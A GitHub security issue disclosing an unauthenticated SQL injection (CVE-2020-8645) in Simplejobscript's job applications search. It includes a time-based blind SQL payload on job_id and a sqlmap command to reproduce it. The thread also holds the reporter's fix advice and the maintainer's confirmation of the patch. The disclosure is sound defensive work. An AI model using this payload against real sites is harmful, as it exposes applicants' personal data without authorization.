Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[security] CVE-2020-8645, SQL injection in job applications search function #9

Closed
gwen001 opened this issue Jan 19, 2020 · 3 comments
Closed

Comments

@gwen001
Copy link

@gwen001 gwen001 commented Jan 19, 2020

Description: An issue was discovered in Simplejobscript.com SJS through 1.66. There is an unauthenticated SQL injection via the job applications search function. The vulnerable parameter is job_id. The function is getJobApplicationsByJobId(). The file is _lib/class.JobApplication.php.

Environment:

Version: 1.64
OS: Ubuntu 16.10
Web server: Apache 2.4.18
PHP: 5.6.40
Database: MySQL 5.7.28
URL: /get_job_applications_ajax.php
Payload: job_id=493+AND+(SELECT+9069+FROM+(SELECT(SLEEP(5)))Ufmy)

Steps to Reproduce:
$ sqlmap --batch --threads=10 --dbms=mysql -u "http://local.simplejobscript.net/get_job_applications_ajax.php" --data="job_id=493" --banner

PoC:
sjs_sqli_jobapplication

@gwen001

This comment has been minimized.

Copy link
Author

@gwen001 gwen001 commented Jan 28, 2020

For that one, I recommend to cast int() the vulnerable parameter.

Also would be great to check that the job_id provided belong to the connected user. For now every user, even not authenticated, can retrieve all applications by looping through that number, which is basically what we call an IDOR.

Best regards.

@niteosoft

This comment has been minimized.

Copy link
Owner

@niteosoft niteosoft commented Feb 4, 2020

Thank you for submitting the issue. We have typecasted the job_id as an integer as you suggested.

@niteosoft niteosoft closed this Feb 4, 2020
@gwen001

This comment has been minimized.

Copy link
Author

@gwen001 gwen001 commented Feb 4, 2020

Great job!

@gwen001 gwen001 changed the title [security] SQL injection in job applications search function [security] CVE-2020-8645, SQL injection in job applications search function Feb 5, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked pull requests

Successfully merging a pull request may close this issue.

None yet
2 participants
You can’t perform that action at this time.